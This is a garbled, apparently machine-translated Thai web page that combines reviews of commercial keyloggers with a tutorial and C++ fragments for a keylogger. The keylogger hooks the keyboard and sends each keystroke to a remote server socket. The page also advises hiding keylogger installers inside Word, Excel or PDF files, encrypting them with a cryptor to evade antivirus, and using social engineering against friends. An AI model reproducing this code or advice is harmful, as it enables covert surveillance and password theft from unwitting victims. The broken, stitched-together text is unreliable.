ดี prote ไม่ได้ varto hush กับมันอย่างแรงแล้ว แอนตี้ไวรัสรู้จักตัวติดตั้งเองได้ง่ายยิ่งขึ้น และสำหรับการติดตั้ง คุณต้องมีสิทธิ์ของผู้ดูแลระบบและเปิดใช้งานบริการและบริการป้องกันไวรัสทั้งหมด เมื่อติดตั้งแล้ว ทุกอย่างจะสมบูรณ์แบบสำหรับทุกโอกาส

นอกจากนี้ ยังมีการอธิบายคุณลักษณะพิเศษ (หุ่นยนต์ที่ใช้เคอร์เนล OS) เพื่อรองรับเวอร์ชันของระบบปฏิบัติการ ซึ่งจะทำงานโดยใช้คีย์ล็อกเกอร์ เวอร์ชัน 5-5.3 (ขับเคลื่อนให้วางเมาส์ไว้ด้านล่าง) รองรับทุกอย่างจนถึงและรวมถึง Windows 7 ชนะ 8/10 เช่นเดียวกับ windows ของตระกูลเซิร์ฟเวอร์ (2003/2008/2012) ไม่ได้รับการสนับสนุนอีกต่อไป Є เวอร์ชัน 6 ซึ่งทำงานได้อย่างอัศจรรย์ รวมทั้ง ใน win 8 และ 10 เป็นไปไม่ได้ที่จะทราบเวอร์ชันที่ถอดรหัสในขณะนี้ Mabut อนาคตจะปรากฏขึ้น ในระหว่างนี้ คุณสามารถดาวน์โหลด Elite keylogger 5.3 เพิ่มเติมได้

ไม่มีโหมดของงานจัดเฟรมซึ่งไม่ได้ทำเพื่อหุ่นยนต์ (สำหรับการทำงานหนักที่คอมพิวเตอร์ของ spivrobitniks ของพวกเขา) หรือคนทั้งกลุ่ม

จุดสำคัญคือความเป็นไปได้ในการสร้างชุดการแจกจ่ายที่ติดตั้งพร้อมการปรับแต่ง (เช่น จากที่อยู่ที่ระบุ เมล ซึ่งคุณต้องเพิ่มพลังให้กับบันทึก) เมื่อคุณออกไป คุณจะถอดชุดการแจกจ่ายออก ซึ่งเมื่อเริ่มต้นระบบจะไม่เห็นความก้าวหน้าหรือวิคอนใดๆ ในอนาคต และหลังจากการติดตั้ง คุณสามารถสร้างได้ด้วยตัวเอง (ซึ่งหมายความว่าตัวเลือกจะแตกต่างออกไป)

สำเนาภาพหน้าจอของรุ่นที่ 5 (เพื่อแสดงว่าทุกอย่างสวยงามและสะดวกบนลื่นไถล):

2. คีย์ล็อกเกอร์แบบออลอินวัน

คะแนน (เต็ม 10) :

  • เอกสารแนบ: 3
  • ประสิทธิภาพ / การใช้งาน: 9
  • ฟังก์ชันการทำงาน: 8

นอกจากนี้ยังเป็นสิ่งที่ยุ่งยาก ฟังก์ชั่นโดยรวมของ Elite keylogger Axis zіskritnіstyu girsche ที่ถูกต้อง รหัสผ่าน Winlogon จะไม่ถูกสกัดกั้นอีกต่อไป ไดรเวอร์ win ไม่ได้เป็น є ไม่ได้ถูกบังคับให้เข้าสู่เคอร์เนล อย่างไรก็ตาม มีการติดตั้งไว้ในระบบและสิ่งที่แนบมาของไดเร็กทอรี AppData ซึ่งไม่ง่ายนักสำหรับไดรเวอร์ของบริษัทอื่นที่จะเข้าถึง (ไม่ใช่ในชื่อของการติดตั้งเหล่านั้น) ป้องกันโปรแกรมป้องกันไวรัส chino รุ่นแรก ๆ ที่ประสบความสำเร็จในการปล้น ดังนั้นการปล้น Qiu Rich นั้นไม่จำเป็น nadіynoy i bezpechnoy กับ vikoristanny ตัวอย่างเช่นคุณต้องทำงานตามหน้าที่ของหน่วยงาน ;) กาวอย่างอื่นหรือเข้ารหัสรหัสเพื่อแนบไปกับโปรแกรมป้องกันไวรัสอย่าไป

Pratsyuєใน OS Win เวอร์ชันใดก็ได้ (ซึ่งใช้งานได้จริง)

ยิ่งไปกว่านั้น ทุกอย่างยอดเยี่ยม: บันทึกทุกอย่าง (ใส่รหัสผ่านเพื่อเข้าสู่ Windows) ถ่ายโอนทุกที่ (รวมถึงอีเมล, ftp, แฟลชไดรฟ์คงที่) สำหรับ zruchnist ดังนั้นทุกอย่างจึงน่าอัศจรรย์

3. สปายเทค SpyAgent

คะแนน (เต็ม 10) :

  • เอกสารแนบ: 4
  • ประสิทธิภาพ / การใช้งาน: 8
  • ฟังก์ชันการทำงาน: 10

คีย์ล็อกเกอร์ที่น่าอับอายมาก แม้ว่าจะคลุมเครือก็ตาม รองรับเวอร์ชัน OS ได้เช่นกัน ฟังก์ชันการทำงานคล้ายกับตัวเลือกก่อนหน้า Іsnuєtsіkavaฟังก์ชันของการทำลายตนเองหลังจากระยะเวลาที่กำหนด (หรือหลังจากถึงวันที่กำหนดไว้)

นอกจากนี้ ยังสามารถบันทึกวิดีโอจากเว็บแคมและเสียงจากไมโครโฟนได้ ซึ่งสามารถขอได้และไม่มีให้จากตัวแทนสองคนก่อนหน้า

Є โหมดหุ่นยนต์ซึ่งสะดวกต่อการก้าวทันเครือข่ายคอมพิวเตอร์ทั้งหมด Vin ก่อนพูด єที่ StaffCop (ก่อนที่จะมองไปรอบๆ บางที โปรแกรมนี้เหมาะสำหรับหุ่นยนต์ที่จะติดตาม spivrobitnik ของพวกเขา (ต้องการผู้นำในด้านนี้โดยไม่ต้องดูแล StaffCop และ LanAgent - ตัวอย่างเช่น Vi - jur. บุคคล, obov'yazkovo ประหลาดใจที่ bik ของพวกเขา) แต่เพื่อติดตามลูกหลานของคุณ คุณชอบนั่งดูไซต์สำหรับผู้ใหญ่ ทูบโต ที่นั่นมีความจำเป็นมากกว่าที่จะไม่แนบ แต่เพื่อให้มีประสิทธิภาพมากขึ้น (รวมถึงนิตยสารที่สวยงามมากมาย - zvіtіvเพียง) ที่ฟังก์ชันของการบล็อกงานของไซต์ / โปรแกรม (SpyAgent มีเหมือนกัน)

4. จอภาพส่วนบุคคล Spyrix

คะแนน (เต็ม 10) :

  • เอกสารแนบ: 4
  • ประสิทธิภาพ / การใช้งาน: 6
  • ฟังก์ชันการทำงาน: 10

ทำหน้าที่เทียบเท่าผู้สมัครคนก่อน อย่างไรก็ตาม มีปัญหาเรื่องความซื่อสัตย์ นอกจากนี้ ฟังก์ชันการทำงานยังรวมถึง cicava ที่อุดมไปด้วย: การคัดลอกไฟล์จากผู้ให้บริการ USB ที่เสียบอยู่ในคอมพิวเตอร์ตลอดจนการตรวจสอบบันทึกจากระยะไกลผ่านบัญชีเว็บบนเว็บไซต์ Spyrix)

5. จอภาพส่วนตัว Spyrix

คะแนน (เต็ม 10) :

  • เอกสารแนบ: 3
  • ประสิทธิภาพ / การใช้งาน: 6
  • ฟังก์ชันการทำงาน: 8

การรายงานไม่สามารถอธิบายได้ tk สำเนาของคีย์ล็อกเกอร์นี้ไม่สามารถทำอะไรที่ไม่ได้อยู่ในสไปเจอร์ด้านหน้าตัวใดตัวหนึ่งได้ อย่างไรก็ตาม คีย์ล็อกเกอร์บางตัวอาจตกอยู่ในจิตวิญญาณ (อย่างน้อยก็มีอินเทอร์เฟซของตัวเอง)

ผลที่ได้คืออะไร?

พาวเวอร์ซัพพลายของคีย์ล็อกเกอร์มีจริยธรรมมากกว่า ใช้เทคนิคน้อยกว่า และถูกเอารัดเอาเปรียบอย่างมากสำหรับวัตถุประสงค์ของคุณ

ในทำนองเดียวกัน คุณเป็นซัพพลายเออร์หุ่นยนต์ที่ต้องการควบคุม spivrobitnikiv ของเขา ใส่ StaffCop อย่างกล้าหาญ รับจดหมายจาก spivrobitnikov ของคุณและอนุญาตให้ดำเนินการดังกล่าว (และสำหรับงานดังกล่าว พวกเขาสามารถทำให้คุณได้ดี) และถูกต้องที่ แหลม ฉันต้องการทราบวิธีปรับปรุงการปฏิบัติของ spivrobitnik โดยเฉพาะและมีประสิทธิภาพ

หากคุณเป็น IT-fahivets-pochatkіvets ซึ่งคุณเพิ่งทดสอบ ถ้าคุณไม่ - คุณเป็นคนโง่ และถ้าคุณทำงานอย่างถูกต้อง ให้ใช้วิธีการของวิศวกรรมสังคมและดำเนินการทดสอบกับเพื่อนของคุณ vikoristovuyuchi การเหนี่ยวนำ be-yaky z อย่างไรก็ตาม โปรดจำไว้ว่า: การสำแดงของกิจกรรมดังกล่าวโดยผู้ที่ตกเป็นเหยื่อไม่ได้ทำให้เกิดมิตรภาพและอายุยืน ;) ฉันไม่ varto ตรวจสอบหุ่นยนต์ของคุณอย่างแน่นอน จำคำพูดของฉัน: ฉันเข้าใจแล้ว ;)

เมต้าของคุณคือการไล่ตามเพื่อน คน ผู้พิพากษา หรือบางที คุณทำงานหนักเพื่อเงิน คิดให้ดี ชิ วาร์โต Adzhe ต้น chi pizno สามารถรับได้ คนนั้นไม่ใช่แบบนั้น: "วิ่งเข้าหาความขาวที่หลงทางของคนอื่น - ไม่พอใจกับพนักงานต้อนรับ" หากคุณยังคงต้องการ (หรือบางทีคุณอาจทำงานในด้านการตรวจสอบความเสียหายของคอมพิวเตอร์และเพื่อให้คุณสามารถใส่รองเท้ามืออาชีพของคุณ) มีเพียงสองตัวเลือกเท่านั้น: The Rat! และ Elite Keylogger ในโหมดการติดชุดแจกจ่ายการติดตั้งที่ติดกาวไว้ที่ word/excel/pdf ในระยะสั้น เข้ารหัสด้วย cryptor ใหม่ให้มากที่สุดเท่าที่จะเป็นไปได้ ในทุกช่วงเวลาเท่านั้นที่คุณสามารถรับประกันกิจกรรมที่ปลอดภัยและความสำเร็จที่แท้จริงได้ไม่มากก็น้อย

แต่ไม่ว่าในกรณีใด โปรดจำไว้ว่าควรใช้คีย์ล็อกเกอร์อย่างมีประสิทธิภาพมากกว่า - เพียงลังกาเล็กเพียงตัวเดียวที่บรรลุเป้าหมาย (รวมถึงการโจมตีธรรมดา) ไม่ได้รับสิทธิ์ของผู้ดูแลระบบ อย่าเข้าถึงทางกายภาพ และไม่ใช่ทั้งหมด koristuvachs จะเปิดอ่านและดาวน์โหลดไฟล์แนบ / คำขอของคุณ (privit social engineering) อย่าเริ่มเปิดโปรแกรมป้องกันไวรัส / keylogger / cryptor ของคุณ . ปัญหาเหล่านี้ทั้งหมดและปัญหาอื่นๆ มากมายสามารถแก้ไขได้ แต่อีกปัญหาหนึ่งเป็นหัวข้อของบทความชุดอื่นๆ ทั้งหมด

พูดได้คำเดียว พยานฯ เริ่มพูดถึงโลกที่ปลอดภัยของข้อมูลแบบพับเก็บได้ ไม่ปลอดภัย และยิ่งกว่านั้นอีก :)

ด้วยความเคารพ,Lisyak O.S.


ก่อนอื่น ให้ดำเนินการก่อนอ่าน - ดูบล็อกของฉัน ซึ่งฉันเผยแพร่บทความของผู้เขียนเกี่ยวกับการเขียนโปรแกรม ไวรัสวิทยา และสุนทรพจน์อื่นๆ
บทความต้นฉบับ

ข้อมูลทั้งหมดจะได้รับเพื่อความรู้ของคุณเท่านั้น ทั้งฝ่ายบริหารและผู้เขียนไม่ต้องรับผิดชอบต่อความเสียหายใด ๆ ที่อาจเกิดขึ้นซึ่งถูกปราบปรามโดยเนื้อหาของบทความนี้


Peredmova
เป็นเวลาประมาณหนึ่งเดือนแล้ว ที่ฉันเฝ้าดูลูกเล่นต่างๆ อยู่เสมอ โดยป้อนคีย์ล็อกเกอร์ ชูคาฟมากเกินไป แต่ไม่รู้วันหยุด ชูคาฟมั่งคั่ง แต่ไม่รู้จักพนักงานขาย ฯลฯ

ในบทความนี้ ฉันต้องการแสดงให้เห็นว่าการเขียนคีย์ล็อกเกอร์ด้วยฟังก์ชันพื้นฐานทำได้ง่ายเพียงใด ฐานฉัน zapoziv zvіdsi - * * แก้ไขข้อบกพร่องและเพิ่มการสนับสนุนเพิ่มเติมสำหรับการโต้ตอบกับ WinSocket

วัสดุ
  • การอัปเดตชุมชน Visual Studio 2015 4
  • Visual C++ 2015
โครงสร้างโปรแกรม
สำหรับ cob จำเป็นต้องระบุว่ามีการใช้ keylogger อย่างไร ไม่ว่าจะเป็นการส่งบันทึกไปยัง FTP/Mail การเขียนไปยังซ็อกเก็ต การแก้ไขไฟล์ไปที่เกต การเขียนบันทึกไปยังฐานข้อมูล
ฉัน virishiv zupinitsya บนซ็อกเก็ต ทำไม Tse zruchno ใช้งานได้จริง
ทางเลือกของ Vykhodyachi เราจะต้องเพิ่ม 2 อาหารเสริม:

เซิร์ฟเวอร์
  • โปรแกรมคอนโซล เพื่อให้คุณได้รับข้อมูลจากไคลเอนต์และดูในคอนโซล
ลูกค้า
  • Vlasne ซึ่งเป็นคีย์ล็อกเกอร์นั่นเอง ซึ่งเป็นวิธีการกดคีย์บนเซิร์ฟเวอร์
ฉันรู้ บางที จากเซิร์ฟเวอร์

เซิร์ฟเวอร์
เราสร้างโปรแกรมคอนโซล C++ ใน Visual Studio
รหัสทั้งหมดอยู่ในสำนักงาน ก้น MSDN - *ดูในฟอรั่มสำหรับการตรวจสอบ *
ไม่จำเป็นสำหรับเราที่จะแทนที่การกระทำที่มีความสำคัญในสิ่งใหม่
มาเขียนการเปลี่ยนแปลงคงที่กัน: ขนาดบัฟเฟอร์และพอร์ตเซิร์ฟเวอร์ที่ส่งบันทึก

รหัส:

#define DEFAULT_BUFLEN 1024 //บัฟเฟอร์ #define DEFAULT_PORT "1337" //พอร์ต

แทนที่จะทำเพียงครั้งเดียว เราใส่การวนซ้ำแบบไม่สิ้นสุด ซึ่งรับข้อมูลในฐานะไคลเอนต์ แสดงที่คอนโซล ปิดวัน และสำหรับวันใหม่:

รหัส:

Do (ClientSocket = accept(ListenSocket, NULL, NULL); //Accept the connection iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);// อ่านบันทึกถ้า (iResult > 0) // บันทึกไม่ว่างเปล่า printf ("% s", recvbuf); //แสดง closesocket(ClientSocket);// ปิด memset วันที่ (recvbuf, 0, sizeof recvbuf);// เรียกคืนหน่วยความจำ) ในขณะที่ (จริง);

รวบรวมใน Release วางบน didik ตรวจสอบพอร์ตที่เราต้องการและเปิดตัว

ลูกค้า


เราสร้างโปรแกรม Win32 ใน Visual Studio
อย่างที่ฉันพูดไปมากกว่านี้ ตะขอคีย์บอร์ดและ obbnik ดันฉัน รับ s *ดูในฟอรั่มสำหรับการตรวจสอบ *
ในการขันสกรูเข้ากับซ็อกเก็ต ฉันหันไปที่ *ดูในฟอรั่มสำหรับการตรวจสอบ *
นอกจากนี้ การเปลี่ยนแปลงการเปลี่ยนแปลงอย่างต่อเนื่องเป็นสิ่งสำคัญ: ความยาวบัฟเฟอร์ ip deda/คอมพิวเตอร์ และพอร์ต

รหัส:

#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"

ฉันมีโอกาสได้ใช้วิธีการเหล่านี้และทำงานทั่วโลก เพื่อให้รหัสสามารถแก้ไขได้อย่างถูกต้อง:

รหัส:

WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdโครงสร้าง; charlastwindow; int บันทึก (การกดแป้นพิมพ์ int); // เอาอีกข้อโต้แย้ง

เราสร้างวิธีการบังคับข้อมูลบนเซิร์ฟเวอร์ที่อยู่ด้านหลังก้น เช่น buv บนซังของย่อหน้า Dalіแทนที่พอร์ต ip และข้อมูลที่ส่งผ่านไปยังอาร์กิวเมนต์ของฟังก์ชันในไม่ช้า:

รหัส:

ถือเป็นโมฆะ sendData (char*ip, char*port, char*data)

สำหรับวิธีการบันทึก จะเหมือนกัน - เราใช้อาร์กิวเมนต์อื่นและเปลี่ยนรายการบันทึกในไฟล์เพื่อแก้ไขไปยังเซิร์ฟเวอร์:

รหัส:

ชาร์ดาต้า; sprintf(ข้อมูล "\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, ข้อมูล);

ต้าหลี่ตามหลักการเดียวกัน เปลี่ยนทิศทางของการโจมตีของกุญแจบริการ การเสริมความแข็งแกร่งตัวอักษรสามารถทำได้ในลำดับนี้:

รหัส:

ชาร์ค; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);

ทุกอย่างที่เชื่อมโยงกับการมองเห็นหน้าต่างในรหัสนั้นชัดเจน และคุณพร้อมแล้ว

Podbag
เมื่อเปิดคีย์ล็อกเกอร์ คีย์ล็อกเกอร์จะหยุดทำงานและกดสกินกับแป้นพิมพ์ เป็นไปได้ว่าสัญลักษณ์บางตัวจะแสดงอย่างไม่ถูกต้อง เช่น ได้ยิน แต่คุณแก้ไขทุกอย่างได้ด้วยตัวเอง (แม้ว่าทุกอย่างสมบูรณ์แบบ ก่อนหน้าฉันใน PM ฉันไล่พระเยซูออกจากพนักงานขายที่ผิดคีย์ล็อกเกอร์ส่วนตัว)

โปรแกรมสอดแนมต่าง ๆ มีความจำเป็นในใจ หากคอมพิวเตอร์หนึ่งเครื่องสามารถเข้าถึงผู้คนจำนวนมากได้

ในความคิดของพวกเขา พวกคอริสทูวาคอาจต้องการทราบ ไซต์ดังกล่าวถูกพบเห็นจากคอมพิวเตอร์เครื่องเดียวกัน (เช่น เด็ก) จี้ไม่ได้ขโมยจากบัตรเครดิตเพื่อช่วยในการบันทึกรหัสผ่าน และอื่นๆ

การตรวจสอบของเราจะช่วยให้คุณค้นหาตัวเลือกที่เหมาะสมที่สุด

คุณสมบัติของทางเลือก

คีย์บอร์ดสำหรับจุกนมของเขาคืออะไร? โปรแกรม Tse ดูเหมือนจะไม่ได้ผูกติดอยู่กับแป้นพิมพ์โดยตรง

Vaughn vstanovlyuєtsyaในปริศนาเกี่ยวกับคอมพิวเตอร์และdіє มักไม่มีสัญญาณของกิจกรรมบนคอมพิวเตอร์ มิฉะนั้น แสดงว่าถูกต้อง

โปรแกรมดังกล่าวเป็นสื่อกลางร่วมกับแป้นพิมพ์เพื่อให้ทำงานร่วมกับโปรแกรมบนพีซี ราวกับว่าเปลี่ยนสัญญาณที่มาถึงโปรเซสเซอร์ซึ่งเป็นผลมาจากการกดปุ่ม ข้อความระหว่างกัน

ข้อมูลนี้จะถูกส่งไปยังซอฟต์แวร์ดังกล่าวสำหรับการเลือกข้อมูลที่ป้อนผ่านแป้นพิมพ์

โปรแกรมอรรถประโยชน์ดังกล่าวเป็นประเภทที่แตกต่างกัน - สำหรับความช่วยเหลือบางส่วน คุณสามารถดูข้อความทั้งหมดที่พิมพ์จากแป้นพิมพ์เพื่อขอความช่วยเหลือจากผู้อื่นได้ - เฉพาะข้อความที่พิมพ์ในเบราว์เซอร์หรือในโปรแกรมที่เลือกเท่านั้น

โปรแกรมDeyakіให้โอกาสในการสร้างจอแสดงผลดังกล่าว มิฉะนั้น - ไม่

ดังนั้นพวกมันจึงมีกลิ่นเหม็นทีละตัวหลังจากระดับการปกปิด ตัวอย่างเช่น กิจกรรมของบางอย่างนั้นชัดเจน บนโต๊ะทำงานมี yarlik น้อยเกินไป โปรแกรมควบคุมกิจกรรมต่างๆ เช่น เด็ก

เราจำไม่ได้ว่าติดตามการปรากฏตัวและกิจกรรมของผู้อื่น - มีกลิ่นเหม็นติดและติดตั้งสำหรับการติดตั้งบนคอมพิวเตอร์ของคนอื่นหากจำเป็นต้องแนบความจริงของการติดตั้งกับ coristuvach บุคคลที่สาม

Vrakhovuchi หลากหลายให้เลือกซอฟต์แวร์ที่เหมาะสมที่สุดที่สามารถพับเก็บได้

ในเอกสารของการส่ง TOP ของโปรแกรมที่ดีที่สุดนี้ เป็นไปได้ที่จะชนะเพื่อจุดประสงค์นี้ ในหมู่พวกเขา มันง่ายกว่าที่จะเลือกสิ่งที่ฉันต้องการ

ลักษณะทางเทคนิค

เพื่อลดความซับซ้อนของกระบวนการในการเลือกซอฟต์แวร์ ในตารางด้านล่าง จะแสดงรายการคุณลักษณะที่เกี่ยวข้องกันของโปรแกรมทั้งหมดที่รวมอยู่ใน TOP

ชื่อประเภทใบอนุญาตประเภทของข้อมูลที่จะรวบรวมการทำงานออกแบบ
SC-KeyLogไม่มีราคาทั้งหมดกว้างการให้อภัย
Keylogger ที่มีประโยชน์ WideStepฟรี/จ่ายเงินทั้งหมดกว้างรีไฟแนนซ์
สายลับตัวจริงจ่ายทั้งหมดDuje กว้างมาตรฐาน
EliteKeyloggerจ่ายทั้งหมดกว้างมาตรฐาน
หนู!ฟรี/จ่ายเงินน้อยลงที่ด้านหน้าจบแบบกว้างไม่สวย
SPYGOไม่มีราคาเวอร์ชันเก่าเวอร์ชันเก่าการออกแบบ Windows มาตรฐาน
Ardamax Keylogger 2.9ไม่มีราคา3 คีย์บอร์ดเสียงการให้อภัย
NS Keylogger จอภาพส่วนบุคคล 3.8ไม่มีราคาทั้งหมดเสียงการให้อภัย
KGB Spyจ่ายแป้นพิมพ์ Z + เปิดโปรแกรมวุซกี้เรียบง่าย
Golden Keylogger 1.32ไม่มีราคา3 คีย์บอร์ดแคบเกินไปเรียบง่าย

ตามลักษณะของตารางเหล่านี้ ง่ายต่อการเลือกโปรแกรมที่เหมาะสมที่สุดสำหรับโปรแกรมเฉพาะ

รายงานเกี่ยวกับยูทิลิตี้นี้แสดงไว้ด้านล่าง

SC-KeyLog

จุดประสงค์คือปริมาณของโปรแกรมที่ใช้งานได้ของ shpigun ซึ่งขยายได้โดยไม่เสียค่าใช้จ่าย

Krim vіdstezhennya โดยไม่มีข้อมูลคนกลาง ป้อนจากแป้นพิมพ์ คุณสามารถเลือกที่อยู่ของไซต์ที่คุณเห็น รหัสผ่าน และหน้าต่างที่คุณป้อนในเบราว์เซอร์

ให้ข้อมูลใหม่เกี่ยวกับกิจกรรมทั้งหมดที่แสดงบนคอมพิวเตอร์ ด้วยความช่วยเหลือของแม่พิมพ์ ไฟล์สามารถดูได้จากตำแหน่งอื่น

  • ความเป็นไปได้ในการเข้าถึงไฟล์จากไฟล์แนบอื่นจากระยะไกล
  • Vіdsutnіstsіlіdіvdіyalnostіโปรแกรมบนคอมพิวเตอร์สำหรับการตั้งค่าที่ถูกต้อง
  • ข้อมูลที่เลือกได้หลากหลาย - มีข้อมูลที่เป็นประโยชน์เกี่ยวกับกิจกรรมทั้งหมดบนพีซี
  • บันทึกรหัสผ่านที่สูงกว่า NT0 เท่านั้น
  • เมนูที่เรียบง่ายเกินไปและการออกแบบที่ไม่สวยงาม
  • เสร็จสิ้นรูปแบบที่ไม่ใช่แบบแมนนวลสำหรับผลลัพธ์

และดูเหมือนว่า coristuvachi ซอฟต์แวร์yakіอย่างแข็งขัน vikoristuyut tsey ซอฟต์แวร์? "เข้าใจยากสำหรับ koristuvach", "Daniel มีสิทธิ์มาที่ไปรษณีย์"

Keylogger ที่มีประโยชน์ WideStep

โปรแกรม Tsya ขยายจิตใจโดยไม่มีค่าใช้จ่าย ราคาของรุ่นที่จ่ายใหม่คือ 35 ดอลลาร์

Dosit tsіkavaที่โปรแกรมการทำงานเช่นการคิดต้นทุนของคุณหากคุณพร้อมที่จะจ่ายเงิน

วิดมินนาข้าว– สร้างแก้ไขข้อมูลที่บันทึกไว้ตามระยะเวลาที่กำหนด ในกรณีอื่น ๆ เป็นเรื่องปกติ มักจะเสถียรสำหรับโปรแกรมอื่นจากรายการนี้

  • การเลือกข้อมูลประเภทต่างๆ
  • การล่องหนของหุ่นยนต์ Povna จากคอมพิวเตอร์ของ coristuvach;
  • อินเทอร์เฟซที่เรียบง่ายและ keruvannya
  • การออกแบบนั้นสั้นกว่า ต่ำกว่าที่โปรแกรมด้านหน้า แต่ทุกอย่างไม่ได้อยู่ด้านบน
  • รูปแบบสำหรับแสดงผลไม่ใช่แบบแมนนวล
  • รุ่นจ่ายค่าใช้จ่ายเป็นจำนวนมาก

ดูซอฟต์แวร์ที่ผ่านเข้ารอบดังนี้: “โปรแกรมที่ชาญฉลาด เรียบง่าย และใช้งานได้จริง Dosit จำชั่วโมงการทำงานไม่ได้

สายลับตัวจริง

โปรแกรมชำระเงินที่ใช้งานได้และพับได้คือ 600 รูเบิล อย่างไรก็ตาม อาจมีรุ่นสาธิตซึ่งสามารถใช้งานได้โดยไม่เสียค่าใช้จ่าย

คุณสมบัติของซอฟต์แวร์- สุขภาพในช่วงเวลางานชั่วโมง

ซึ่งช่วยแก้ปัญหาการใส่รหัสผ่าน/คีย์แบบกราฟิกได้ เนื่องจากเวลาที่เหลือของชั่วโมงเริ่มแพร่ระบาดในวงกว้าง

  • ประเภทของข้อมูลที่ไม่ระบุชื่อที่รวบรวม บวกกับความสามารถในการจับภาพหน้าจอจากหน้าจอในช่วงระยะเวลาการนัดหมาย
  • มีฟังก์ชันและคุณสมบัติเพิ่มเติมอื่นๆ มากมาย
  • เขียนจามรีdіїและชั่วโมง vikonannya;
  • เข้ารหัสล็อกการก่อตัว
  • จำนวนน้อยของงาน (การเลือกข้อมูล) สำหรับรุ่นสาธิตฟรีที่จะกลายเป็น 40 ปากกา;
  • จ่ายกว้างขึ้นถ้าคุณต้องการราคาที่มากขึ้น - น้อยกว่าเป็นที่ยอมรับ;
  • จบโปรแกรมได้ดีมาก

ความคิดเห็นของผู้สื่อข่าวเกี่ยวกับโปรแกรมนี้มีดังนี้: “โปรแกรมนี้ได้รับการยอมรับ โปรแกรมเมอร์ทำได้ดีมาก!

EliteKeylogger

โปรแกรมจ่ายราคาสูง- 69 ดอลลาร์ บนพีซีมันจะหยั่งรู้ในโหมดระดับต่ำดังนั้นจึงอาจไม่ปรากฏขึ้น

Tsіkavaที่ zruchna ภาวะเอกฐาน- การเปิดตัวซอฟต์แวร์โดยอัตโนมัติซึ่งเริ่มต้นทันทีหลังจากเปิดตัวระบบเอง

มันใช้งานได้ดีหรือไม่แสดงพร้อมกับตัวป้องกันคีย์ล็อกพิเศษ

  • Povnistyu prihovana diya ที่skladnіstі v vyyavlennі;
  • รูปแบบของหุ่นยนต์คือประเภทของไดรเวอร์ระดับต่ำและการเริ่มต้นอัตโนมัติในชั่วโมงที่มีการเข้าใช้ของระบบ
  • Vіdstezhuєі takozh ฉัน natiskannya ไม่เพียง แต่หลัก แต่ปุ่มบริการบนแป้นพิมพ์
  • ระบบติดตั้งซอฟต์แวร์ Dosit แบบพับได้บนพีซี
  • โปรแกรมมีคุณภาพสูง แต่บนอินเทอร์เน็ตของรัสเซียคุณสามารถค้นหาเวอร์ชันเก่าที่ชั่วร้ายได้
  • ระบบ Dosit ที่ยุบได้ของโปรแกรมіndivіdualnykh nashtuvan, จามรี, vtіm, มีคุณธรรมในตัวเอง

ดูเหมือนว่า coristuvachi เกี่ยวกับซอฟต์แวร์นี้เป็นอย่างไร "โปรแกรมดี", "Trochs ไม่ถึง Jetlogger"

หนู!

Dosit ขยายตัวและเป็นที่นิยม ยูทิลิตี้ที่ใช้งานได้พร้อมใบอนุญาตแบบชำระเงิน

อย่างไรก็ตาม เวอร์ชันเดโมฟรีที่มีระยะเวลาจำกัดนั้นหวังว่าจะเป็นเสียงส่วนตัว

โปรแกรมนี้ง่ายมาก- เขียนสิ่งนี้ด้วยตัวเองบางที koristuvach เหนียว ๆ ทิมไม่น้อยไปกว่านี้แทบจะเป็นไปไม่ได้เลยสำหรับแอนตี้ไวรัสและโปรแกรมพิเศษที่ตรวจพบซอฟต์แวร์ดังกล่าว

  • ความเรียบง่าย การทำงาน และความมั่นคงสูงของงาน
  • จำนวนพื้นที่ขั้นต่ำสำหรับไฟล์ตามที่ขอยืมในคอมพิวเตอร์
  • เพื่อเสร็จสิ้น bagato nalashtuvan
  • เสร็จสิ้นการออกแบบที่ยอมรับไม่ได้ ขยิบตาด้วยสีดำ สีขาว และสีแดง
  • ฟังก์ชั่น deshcho ก่อนหน้านี้ต่ำกว่าในโปรแกรมที่อธิบายไว้ก่อนหน้านี้
  • การทบทวนโดยไม่ได้จัดการของนิตยสารและภาพรวมของส่วนต่อประสานที่ไม่มีการจัดการและวิคตอเรีย

Coristuvachi พูดถึงโปรแกรมนี้ว่า “การฝึกมีความเสถียร เบียร์ธรรมดา” “โปรแกรมนี้ดี ช่วยให้คุณรวบรวมข้อมูลได้โดยไม่ต้องใช้หน่วยความจำ”

SPYGO

ราคาของคีย์ล็อกเกอร์ใหม่ การมอบหมายงานและการแบ่งแยกโดยโปรแกรมเมอร์ชาวรัสเซีย

© 2022 androidas.ru - ทั้งหมดเกี่ยวกับ Android